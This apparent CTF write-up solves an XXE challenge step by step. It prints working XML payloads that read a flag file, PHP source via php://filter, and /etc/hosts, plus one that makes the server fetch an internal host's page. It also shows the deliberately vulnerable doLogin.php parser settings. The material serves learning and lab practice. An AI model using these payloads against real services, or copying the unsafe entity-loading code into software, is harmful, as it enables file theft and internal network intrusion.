I plan to post this twice, once here and once on CSDN; what is posted here is hard to find through a browser search, so nobody sees it, which is no fun.
This is the second XXE-type challenge. The request is sent with Content-Type: application/xml;charset=utf-8.
The body looks familiar, so the first payload is:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "./flag.txt">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
The error in the response shows that the key file is doLogin.php, so read it through the php:// wrapper. The base64 filter matters: an external entity is expanded as parsed XML, so raw PHP source (which contains `<` and `?>`) would make the document malformed and never reach the response, whereas its base64 form is plain text. The second payload and the base64-decoded doLogin.php are:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
<?php
/**
 * author: c0ny1
 * date: 2018-2-7
 */
$USERNAME = 'admin'; // account
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; // password
$result = null;
// Explicitly re-enables loading of external entities: this is the unsafe setting.
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the DTD, so a
    // SYSTEM entity declared in the request body is fetched and expanded.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $username = $creds->username;
    $password = $creds->password;
    if($username == $USERNAME && $password == $PASSWORD){
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
    }else{
        // The expanded entity is reflected back in <msg>, which is what leaks file contents.
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
    }
}catch(Exception $e){
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
Nothing useful in there. XXE can be exploited in many other ways, though, including the one needed here: reaching hosts on the internal network. First read /etc/hosts through file://; the payload is:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
The response is:
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
173.122.253.10 osrc
This is the same kind of hostname-to-address table as the hosts file on Windows and serves the same purpose; the last entry, 173.122.253.10 osrc, is the one that matters because it reveals the internal subnet.
Reading the flag
The payload is:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "http://173.122.253.11">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
The flag lives on the next address after osrc, http://173.122.253.11: the entity fetches that host's page and the response contains the flag.